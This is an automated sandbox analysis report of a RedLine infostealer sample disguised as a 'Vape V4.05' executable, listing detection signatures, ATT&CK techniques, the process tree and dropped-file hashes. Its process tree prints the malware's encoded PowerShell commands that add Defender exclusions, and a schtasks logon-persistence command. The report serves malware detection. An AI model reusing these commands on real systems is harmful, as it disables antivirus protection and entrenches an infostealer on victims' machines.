redline | 829e4cdc3b9823f5967f4d84c0a5f0e654e95760d09eb5de9c9ad91544dc9478

Resubmissions

17-02-2022 14:46

220217-r5dpmacedn 10

17-02-2022 07:27

220217-h98k5aaeg8 10

Analysis

max time kernel
152s
max time network
174s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
17-02-2022 07:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Vape V4.05.exe
Size

13.9MB
MD5

b26285219a7d20505e4a8628fe4092f2
SHA1

9b0109eb2e0fd5a401820262fe9a8272600685b1
SHA256

829e4cdc3b9823f5967f4d84c0a5f0e654e95760d09eb5de9c9ad91544dc9478
SHA512

da09d8e018d77c5cd4d56afc03b4228fdf5a9dbca0294c41f2808a7f106ad118253b895db87f6f6461b11830401e07e304c92572a0678bdb390e5e9b67cbe7d3

Score

10^/10

redline evasion infostealer stealer themida trojan

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 3732 created 2416 3732 WerFault.exe Vape_V4.exe

description	pid	process	target process
PID 3732 created 2416	3732	WerFault.exe	Vape_V4.exe

evasion 1 IoCs

evasion.

evasion

Processes:

resource	yara_rule
behavioral2/memory/2636-130-0x0000000000400000-0x00000000015DC000-memory.dmp	evasion

rl_trojan 1 IoCs

redline stealer.

stealer

Processes:

resource	yara_rule
behavioral2/memory/2636-130-0x0000000000400000-0x00000000015DC000-memory.dmp	redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Executes dropped EXE 4 IoCs

Processes:

syn conhost.exeVape_V4.exeservices32.exesihost64.exe

pid process

812 syn conhost.exe
2416 Vape_V4.exe
1048 services32.exe
2356 sihost64.exe

pid	process
812	syn conhost.exe
2416	Vape_V4.exe
1048	services32.exe
2356	sihost64.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Vape_V4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Vape_V4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Vape_V4.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Vape V4.05.exeVape_V4.exeservices32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Vape V4.05.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Vape_V4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	services32.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe	themida
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Vape_V4.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Vape_V4.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Vape V4.05.exeVape_V4.exe

pid process

2636 Vape V4.05.exe
2416 Vape_V4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Vape_V4.exe

pid	process
2636	Vape V4.05.exe
2416	Vape_V4.exe

Drops file in Windows directory 8 IoCs

Processes:

svchost.exeTiWorker.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3236 2416 WerFault.exe Vape_V4.exe

pid	pid_target	process	target process
3236	2416	WerFault.exe	Vape_V4.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1696 schtasks.exe

pid	process
1696	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exeVape_V4.exepowershell.exeWerFault.exesyn conhost.exepowershell.exepowershell.exeservices32.exe

pid	process
1920	powershell.exe
2416	Vape_V4.exe
2416	Vape_V4.exe
2416	Vape_V4.exe
2416	Vape_V4.exe
1920	powershell.exe
3256	powershell.exe
3236	WerFault.exe
3236	WerFault.exe
3256	powershell.exe
812	syn conhost.exe
2452	powershell.exe
2452	powershell.exe
1172	powershell.exe
1172	powershell.exe
1048	services32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeVape_V4.exepowershell.exesyn conhost.exepowershell.exepowershell.exeservices32.exesvchost.exeTiWorker.exe

description	pid	process
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	2416	Vape_V4.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	812	syn conhost.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	1048	services32.exe
Token: SeShutdownPrivilege	1612	svchost.exe
Token: SeCreatePagefilePrivilege	1612	svchost.exe
Token: SeShutdownPrivilege	1612	svchost.exe
Token: SeCreatePagefilePrivilege	1612	svchost.exe
Token: SeShutdownPrivilege	1612	svchost.exe
Token: SeCreatePagefilePrivilege	1612	svchost.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe
Token: SeBackupPrivilege	1092	TiWorker.exe
Token: SeRestorePrivilege	1092	TiWorker.exe
Token: SeSecurityPrivilege	1092	TiWorker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Vape V4.05.exe

pid process

2636 Vape V4.05.exe

pid	process
2636	Vape V4.05.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

Vape V4.05.exesyn conhost.execmd.exeWerFault.execmd.execmd.exeservices32.execmd.exe

description	pid	process	target process
PID 2636 wrote to memory of 812	2636	Vape V4.05.exe	syn conhost.exe
PID 2636 wrote to memory of 812	2636	Vape V4.05.exe	syn conhost.exe
PID 2636 wrote to memory of 2416	2636	Vape V4.05.exe	Vape_V4.exe
PID 2636 wrote to memory of 2416	2636	Vape V4.05.exe	Vape_V4.exe
PID 812 wrote to memory of 1560	812	syn conhost.exe	cmd.exe
PID 812 wrote to memory of 1560	812	syn conhost.exe	cmd.exe
PID 1560 wrote to memory of 1920	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1920	1560	cmd.exe	powershell.exe
PID 3732 wrote to memory of 2416	3732	WerFault.exe	Vape_V4.exe
PID 3732 wrote to memory of 2416	3732	WerFault.exe	Vape_V4.exe
PID 1560 wrote to memory of 3256	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 3256	1560	cmd.exe	powershell.exe
PID 812 wrote to memory of 628	812	syn conhost.exe	cmd.exe
PID 812 wrote to memory of 628	812	syn conhost.exe	cmd.exe
PID 628 wrote to memory of 1696	628	cmd.exe	schtasks.exe
PID 628 wrote to memory of 1696	628	cmd.exe	schtasks.exe
PID 812 wrote to memory of 4884	812	syn conhost.exe	cmd.exe
PID 812 wrote to memory of 4884	812	syn conhost.exe	cmd.exe
PID 4884 wrote to memory of 1048	4884	cmd.exe	services32.exe
PID 4884 wrote to memory of 1048	4884	cmd.exe	services32.exe
PID 1048 wrote to memory of 4052	1048	services32.exe	cmd.exe
PID 1048 wrote to memory of 4052	1048	services32.exe	cmd.exe
PID 4052 wrote to memory of 2452	4052	cmd.exe	powershell.exe
PID 4052 wrote to memory of 2452	4052	cmd.exe	powershell.exe
PID 4052 wrote to memory of 1172	4052	cmd.exe	powershell.exe
PID 4052 wrote to memory of 1172	4052	cmd.exe	powershell.exe
PID 1048 wrote to memory of 2356	1048	services32.exe	sihost64.exe
PID 1048 wrote to memory of 2356	1048	services32.exe	sihost64.exe

C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe
"C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2636

C:\Users\Admin\AppData\Local\Temp\syn conhost.exe
"C:\Users\Admin\AppData\Local\Temp\syn conhost.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
4⤵
- Creates scheduled task(s)
PID:1696

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4884

C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
5⤵
- Executes dropped EXE
PID:2356

C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2416 -s 680
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3236

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 2416 -ip 2416
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c1b0a9f26c3e1786191e94e419f1fbf9

SHA1
7f3492f4ec2d93e164f43fe2606b53edcffd8926

SHA256
796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113

SHA512
fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
50d3033f2bc3a3774c469d03e71a79a9

SHA1
22027b1d52085de99b3bffa276530fea5d961471

SHA256
2987e99ec7fa17bd4ab7de3cb4dc62645e1052012a5a357904d6fc6db9054147

SHA512
ecf7ab1a9e4192454a3e24c60453fd702a8c648e00078fc933b9182f4a3d3c10c6f5da622a5729b35727e6ddc8837029caddcaf76f56e805b9744253b56da5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe

MD5
7407fd99ee1940051b4f543656ea9b0a

SHA1
7149b25db501b75111ac77fe4bcfe6915058757a

SHA256
bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd

SHA512
804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe

MD5
7407fd99ee1940051b4f543656ea9b0a

SHA1
7149b25db501b75111ac77fe4bcfe6915058757a

SHA256
bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd

SHA512
804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d

Download Submit
C:\Users\Admin\AppData\Local\Temp\syn conhost.exe

MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
C:\Users\Admin\AppData\Local\Temp\syn conhost.exe

MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe

MD5
e83a53213ee5593da07c3da2fa6e53c4

SHA1
230cd2f92bfcb38a727209a0ed14272aec969a59

SHA256
8bb79f322069a21f06ceb8916aef6dddeb7934c25ef35b8a38b918491d648c66

SHA512
dd667fc2fcbe26547d16cc9a6ce18e55c57c62cee1bd365ebef17e88d0f0694bec69921179433b06fa89569d7b52f064b8ba0cc8b2fab3e13cb4b089b9b3e1dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe

MD5
e83a53213ee5593da07c3da2fa6e53c4

SHA1
230cd2f92bfcb38a727209a0ed14272aec969a59

SHA256
8bb79f322069a21f06ceb8916aef6dddeb7934c25ef35b8a38b918491d648c66

SHA512
dd667fc2fcbe26547d16cc9a6ce18e55c57c62cee1bd365ebef17e88d0f0694bec69921179433b06fa89569d7b52f064b8ba0cc8b2fab3e13cb4b089b9b3e1dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe

MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe

MD5
8d219ec4b3221c9e18f05d663b245a7b

SHA1
08f956878fa7144d425a7be049d172ce743424d4

SHA256
15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8

SHA512
db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f

Download Submit
memory/812-137-0x00007FFC4DBB3000-0x00007FFC4DBB5000-memory.dmp

Filesize
8KB

Download
memory/812-138-0x00000000018F0000-0x00000000018F2000-memory.dmp

Filesize
8KB

Download
memory/812-135-0x0000000001250000-0x0000000001262000-memory.dmp

Filesize
72KB

Download
memory/812-133-0x0000000000840000-0x0000000000A2E000-memory.dmp

Filesize
1.9MB

Download
memory/1048-156-0x00007FFC4DC93000-0x00007FFC4DC95000-memory.dmp

Filesize
8KB

Download
memory/1048-157-0x0000000002D80000-0x0000000002D82000-memory.dmp

Filesize
8KB

Download
memory/1612-168-0x000001B8CB730000-0x000001B8CB740000-memory.dmp

Filesize
64KB

Download
memory/1612-169-0x000001B8CB790000-0x000001B8CB7A0000-memory.dmp

Filesize
64KB

Download
memory/1612-170-0x000001B8CE4B0000-0x000001B8CE4B4000-memory.dmp

Filesize
16KB

Download
memory/1920-140-0x0000023CC74A0000-0x0000023CC74C2000-memory.dmp

Filesize
136KB

Download
memory/1920-144-0x0000023CDF626000-0x0000023CDF628000-memory.dmp

Filesize
8KB

Download
memory/1920-141-0x0000023CC6893000-0x0000023CC6895000-memory.dmp

Filesize
8KB

Download
memory/1920-145-0x0000023CDF628000-0x0000023CDF629000-memory.dmp

Filesize
4KB

Download
memory/1920-143-0x0000023CDF623000-0x0000023CDF625000-memory.dmp

Filesize
8KB

Download
memory/1920-142-0x0000023CDF620000-0x0000023CDF622000-memory.dmp

Filesize
8KB

Download
memory/2356-166-0x00007FFC4DC93000-0x00007FFC4DC95000-memory.dmp

Filesize
8KB

Download
memory/2356-167-0x000000001DD90000-0x000000001DD92000-memory.dmp

Filesize
8KB

Download
memory/2356-165-0x0000000000D90000-0x0000000000D96000-memory.dmp

Filesize
24KB

Download
memory/2416-139-0x00007FFC6E650000-0x00007FFC6E652000-memory.dmp

Filesize
8KB

Download
memory/2452-161-0x000001EC97AD6000-0x000001EC97AD8000-memory.dmp

Filesize
8KB

Download
memory/2452-160-0x000001EC97AD3000-0x000001EC97AD5000-memory.dmp

Filesize
8KB

Download
memory/2452-159-0x000001EC97AD0000-0x000001EC97AD2000-memory.dmp

Filesize
8KB

Download
memory/2452-158-0x000001EC96E53000-0x000001EC96E55000-memory.dmp

Filesize
8KB

Download
memory/2636-130-0x0000000000400000-0x00000000015DC000-memory.dmp

Filesize
17.9MB

Download
memory/3256-152-0x000001EBC6678000-0x000001EBC6679000-memory.dmp

Filesize
4KB

Download
memory/3256-148-0x000001EBC6670000-0x000001EBC6672000-memory.dmp

Filesize
8KB

Download
memory/3256-147-0x000001EBAD833000-0x000001EBAD835000-memory.dmp

Filesize
8KB

Download
memory/3256-149-0x000001EBC6673000-0x000001EBC6675000-memory.dmp

Filesize
8KB

Download
memory/3256-151-0x000001EBC6676000-0x000001EBC6678000-memory.dmp

Filesize
8KB

Download